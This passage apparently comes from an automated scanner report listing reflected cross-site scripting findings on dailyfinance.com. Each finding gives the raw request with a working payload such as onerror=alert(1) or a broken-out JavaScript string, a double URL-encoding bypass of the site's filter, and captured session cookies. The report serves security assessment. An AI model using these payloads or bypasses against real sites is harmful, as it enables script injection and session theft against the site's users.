This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/real-estate/?6e4d4"-alert(1)-"9461b2061e1=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c2c7%2522%253b9a37d7649dc was submitted in the REST URL parameter 2. This input was echoed as 3c2c7";9a37d7649dc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/special-report3c2c7%2522%253b9a37d7649dc/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b9b2"><img%20src%3da%20onerror%3dalert(1)>c8b45655a6d was submitted in the REST URL parameter 2. This input was echoed as 5b9b2"><img src=a onerror=alert(1)>c8b45655a6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/special-report5b9b2"><img%20src%3da%20onerror%3dalert(1)>c8b45655a6d/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <meta property="og:title" content="Special Report5b9b2"><img Src=a Onerror=alert(1)>c8b45655a6d" /> ...[SNIP]...
1.333. http://www.dailyfinance.com/category/special-report/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /category/special-report/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc907"-alert(1)-"0e20d905d48 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/special-report/?fc907"-alert(1)-"0e20d905d48=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2aac"><img%20src%3da%20onerror%3dalert(1)>3f45b070d75 was submitted in the REST URL parameter 2. This input was echoed as e2aac"><img src=a onerror=alert(1)>3f45b070d75 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /category/streetwisee2aac"><img%20src%3da%20onerror%3dalert(1)>3f45b070d75 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77060%2522%253b3b7e990b527 was submitted in the REST URL parameter 2. This input was echoed as 77060";3b7e990b527 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/streetwise77060%2522%253b3b7e990b527 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c952"><img%20src%3da%20onerror%3dalert(1)>4d39c3d6f77 was submitted in the REST URL parameter 2. This input was echoed as 3c952"><img src=a onerror=alert(1)>4d39c3d6f77 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/technology3c952"><img%20src%3da%20onerror%3dalert(1)>4d39c3d6f77/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd6b1%2522%253bd22c82341f6 was submitted in the REST URL parameter 2. This input was echoed as bd6b1";d22c82341f6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/technologybd6b1%2522%253bd22c82341f6/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
1.338. http://www.dailyfinance.com/category/technology/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /category/technology/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f163"-alert(1)-"51fc313d1f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/technology/?6f163"-alert(1)-"51fc313d1f7=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9ba9%2522%253bbd8cd48cb3a was submitted in the REST URL parameter 2. This input was echoed as b9ba9";bd8cd48cb3a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /category/videob9ba9%2522%253bbd8cd48cb3a/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f65ec"><img%20src%3da%20onerror%3dalert(1)>1ad79d1c918 was submitted in the REST URL parameter 2. This input was echoed as f65ec"><img src=a onerror=alert(1)>1ad79d1c918 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /category/videof65ec"><img%20src%3da%20onerror%3dalert(1)>1ad79d1c918/ HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http:/ ...[SNIP]... <meta property="og:title" content="Videof65ec"><img Src=a Onerror=alert(1)>1ad79d1c918" /> ...[SNIP]...
1.341. http://www.dailyfinance.com/category/video/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /category/video/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b09d3"-alert(1)-"bf591ebbfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/video/?b09d3"-alert(1)-"bf591ebbfe=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.342. http://www.dailyfinance.com/help/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /help/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9540e"-alert(1)-"43e7c07bfb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /help/?9540e"-alert(1)-"43e7c07bfb4=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.343. http://www.dailyfinance.com/historical-stock-prices/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /historical-stock-prices/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4cdb"-alert(1)-"c1b9b129a35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /historical-stock-prices/?b4cdb"-alert(1)-"c1b9b129a35=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.344. http://www.dailyfinance.com/market-news/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /market-news/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96d90"-alert(1)-"ebe0fa8028d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /market-news/?96d90"-alert(1)-"ebe0fa8028d=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.345. http://www.dailyfinance.com/market-news/bonds/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /market-news/bonds/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac0f1"-alert(1)-"f0d21ded1cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /market-news/bonds/?ac0f1"-alert(1)-"f0d21ded1cc=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.346. http://www.dailyfinance.com/market-news/currencies/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /market-news/currencies/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7c5d"-alert(1)-"2972ce4d413 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /market-news/currencies/?c7c5d"-alert(1)-"2972ce4d413=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.347. http://www.dailyfinance.com/market-news/futures/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /market-news/futures/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fae5a"-alert(1)-"661e80f0291 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /market-news/futures/?fae5a"-alert(1)-"661e80f0291=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.348. http://www.dailyfinance.com/market-news/futures/commodities/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /market-news/futures/commodities/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed6bf"-alert(1)-"cca0a4d548f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /market-news/futures/commodities/?ed6bf"-alert(1)-"cca0a4d548f=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
1.349. http://www.dailyfinance.com/market-news/international/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.dailyfinance.com
Path: /market-news/international/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a8b8"-alert(1)-"d40344d64df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /market-news/international/?8a8b8"-alert(1)-"d40344d64df=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AOL_StockQuotesLiveUpdate=1; JSESSIONID=5594804D62BCC538E725AE330C004F81; s_pers=%20s_getnr%3D1297021689107-New%7C1360093689107%3B%20s_nrgvo%3DNew%7C1360093689158%3B; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; df_mon_dom=true; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.b14a;
Response
var s_code=s_265.t(); } var s_account="aoldailyfin,aolsvc"; (function(){ var d = document, s = d.createElement('script'); s.type = 'text/javascript'; s.src = ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ead7'%3b01fd5909b1 was submitted in the REST URL parameter 2. This input was echoed as 1ead7';01fd5909b1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /markets/mostactives1ead7'%3b01fd5909b1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
